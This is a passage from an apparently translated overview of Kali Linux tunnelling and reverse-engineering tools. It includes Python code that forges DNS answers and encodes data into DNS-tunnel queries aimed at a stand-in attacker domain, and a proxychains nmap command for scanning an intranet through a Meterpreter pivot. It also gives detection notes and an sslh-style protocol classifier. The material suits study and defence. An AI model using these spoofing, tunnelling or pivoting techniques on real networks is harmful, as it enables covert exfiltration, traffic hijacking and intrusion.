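        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == 1:
            answers.append((name, socket.inet_ntoa(rdata)))
    return {"id": txid, "answers": answers}

def tunnel_encode(data, domain, max_label=63):
    """Upstream half of a DNS tunnel: base32 the payload into labels (each at
    most 63 bytes) under a domain whose authoritative server we run, so any
    resolver, including a captive portal's, forwards it to us."""
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    labels = [b32[i:i + max_label] for i in range(0, len(b32), max_label)]
    return ".".join(labels + [domain])

def tunnel_decode(qname, domain):
    """Server side: strip the domain, join the labels, undo base32."""
    if not qname.endswith("." + domain):
        raise ValueError("query not under tunnel domain")
    b32 = qname[:-len(domain) - 1].replace(".", "").upper()
    b32 += "=" * (-len(b32) % 8)
    return base64.b32decode(b32)

if __name__ == "__main__":
    hosts = {"www.baidu.com": "192.168.1.5"}            # the /root/hosts mapping
    reply = forge_response(build_query("www.baidu.com", txid=0xBEEF), hosts)
    print(parse_response(reply))
    name = tunnel_encode(b"GET / HTTP/1.0\r\n", "t.attacker.example")
    print(name, tunnel_decode(name, "t.attacker.example"))
```

The tunnel's limits are visible here too: a full name is capped at 253 bytes and each label at 63, base32 costs 60 percent overhead, and the queries are easy to spot in resolver logs as long random subdomains of one domain with unusually high query volume.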
3. Iodine
4. Miredo
Miredo is a Teredo tunnelling tool for BSD and Linux that provides IPv6 connectivity over IPv4, including from behind NAT. The kernel needs IPv6 and TUN support.
5. Proxychains
A tool often used in intranet penetration testing. For example, after using Meterpreter to start a SOCKS4a proxy, we add the proxy to the /etc/proxychains.conf configuration file, and other tools such as sqlmap and nmap can then scan the intranet through the proxy directly.
For example: proxychains nmap -sT -Pn 10.0.0.1/24
(proxychains only relays TCP connections made through the socket library, so nmap must use a full TCP connect scan, -sT, and skip the ICMP/ARP host discovery with -Pn; SYN scans, UDP scans and pings bypass the proxy and go out from the attacker's own host)
6. Proxytunnel
Proxytunnel connects to a remote server through a standard HTTPS proxy, i.e. it is a proxy that implements bridging; it is used specifically to carry SSH over HTTP(S) proxies.
Proxytunnel can be used to:
create a communication channel through an HTTP(S) proxy using the HTTP CONNECT command;
act as a client driver (ProxyCommand) for OpenSSH, creating SSH connections through an HTTP(S) proxy;
run as a stand-alone application that connects to remote servers.
7. Ptunnel
Establishes tunnel communication using ICMP packets.
8. Pwnat
Communication between hosts that are both behind NAT, using UDP and without port forwarding.
9. sslh
sslh is an SSL/SSH port multiplexing tool: it accepts HTTPS, SSH and OpenVPN connections on the same port, decides from the first bytes the client sends which backend a connection belongs to, and forwards it there. This makes it possible to reach an SSH or OpenVPN server through port 443 while still serving HTTPS on that port, and it is a good example for studying port multiplexing.
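The decision sslh makes on each new connection can be written down in a few lines, and doing so shows both why port-based firewall rules cannot tell these protocols apart and what a payload-inspecting detector has to look at. This added example (not sslh's source) uses simplified probes: an SSH client sends its version banner immediately, a TLS ClientHello is a handshake record for protocol 3.x, OpenVPN over TCP begins with a 2-byte length of 14 and the hard-reset opcode, HTTP begins with a method, and a client that sends nothing is assumed to be SSH, since there the server speaks first. The backend table is constructed.

```python
"""Protocol demultiplexing on one port, as a multiplexer like sslh does it.
Added example with simplified probes; the backend table is constructed."""

BACKENDS = {                     # constructed: what an sslh.cfg might route to
    "ssh": ("127.0.0.1", 22),
    "tls": ("127.0.0.1", 4443),
    "openvpn": ("127.0.0.1", 1194),
    "http": ("127.0.0.1", 8080),
}

HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"OPTIONS ", b"DELETE ", b"CONNECT ")


def classify_first_bytes(data):
    """Name the protocol from the first bytes a client sent on port 443.

    Probes, in order:
    - SSH: the client version banner "SSH-" (sent right away by OpenSSH).
    - TLS: record type 0x16 (handshake) with version 0x03 0x00..0x04.
    - OpenVPN/TCP: 2-byte packet length 14 followed by the opcode byte for
      P_CONTROL_HARD_RESET_CLIENT_V2 (opcode 7 in the high 5 bits).
    - HTTP: a request method.
    Anything else, including an empty read after the probe timeout, falls
    back to SSH: an SSH server speaks first, so a silent client is normal."""
    if data.startswith(b"SSH-"):
        return "ssh"
    if len(data) >= 3 and data[0] == 0x16 and data[1] == 0x03 and data[2] <= 0x04:
        return "tls"
    if len(data) >= 3 and data[0] == 0x00 and data[1] == 0x0E and (data[2] >> 3) == 7:
        return "openvpn"
    if data.startswith(HTTP_METHODS):
        return "http"
    return "ssh"


def route(data, backends=BACKENDS):
    """(host, port) the multiplexer forwards this connection to."""
    return backends[classify_first_bytes(data)]


if __name__ == "__main__":
    samples = {
        "openssh client": b"SSH-2.0-OpenSSH_9.6\r\n",
        "tls clienthello": bytes([0x16, 0x03, 0x01, 0x02, 0x00, 0x01, 0x00]),
        "openvpn reset": bytes([0x00, 0x0E, 0x38]) + bytes(11),
        "curl": b"GET / HTTP/1.1\r\nHost: x\r\n\r\n",
        "silent client": b"",
    }
    for label, first in samples.items():
        print(f"{label:16} -> {classify_first_bytes(first)} {route(first)}")
```

The same probes are what a network IDS or an egress proxy must apply to traffic on 443 if it wants to notice SSH or a VPN hiding behind the HTTPS port; matching on the port number alone sees only "HTTPS".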

Kali reverse engineering tools

Reverse engineering means deducing how something is implemented by analysing an existing artefact and its results. For example, if someone else's exe program produces a beautiful animation effect, you can analyse how the effect is realised through disassembly, decompilation and dynamic tracing; this is reverse engineering. It is not only decompilation but also recovering the design and documenting it; the purpose of reverse software engineering is to make the software maintainable.
1. Edb-Debugger
EDB (Evan's Debugger) is a binary debugger built on Qt4, intended as an OllyDbg-like tool for Linux. Its functions can be extended through a plug-in system. Currently only Linux is supported.
2. OllyDbg
The classic ring-3 debugger, a dynamic debugging tool that combines ideas from IDA and SoftICE. Under Kali, OllyDbg runs under Wine.
3. jad (Java decompiler)
4. Radare2
5. REC Studio (decompiler)
6. Apktool
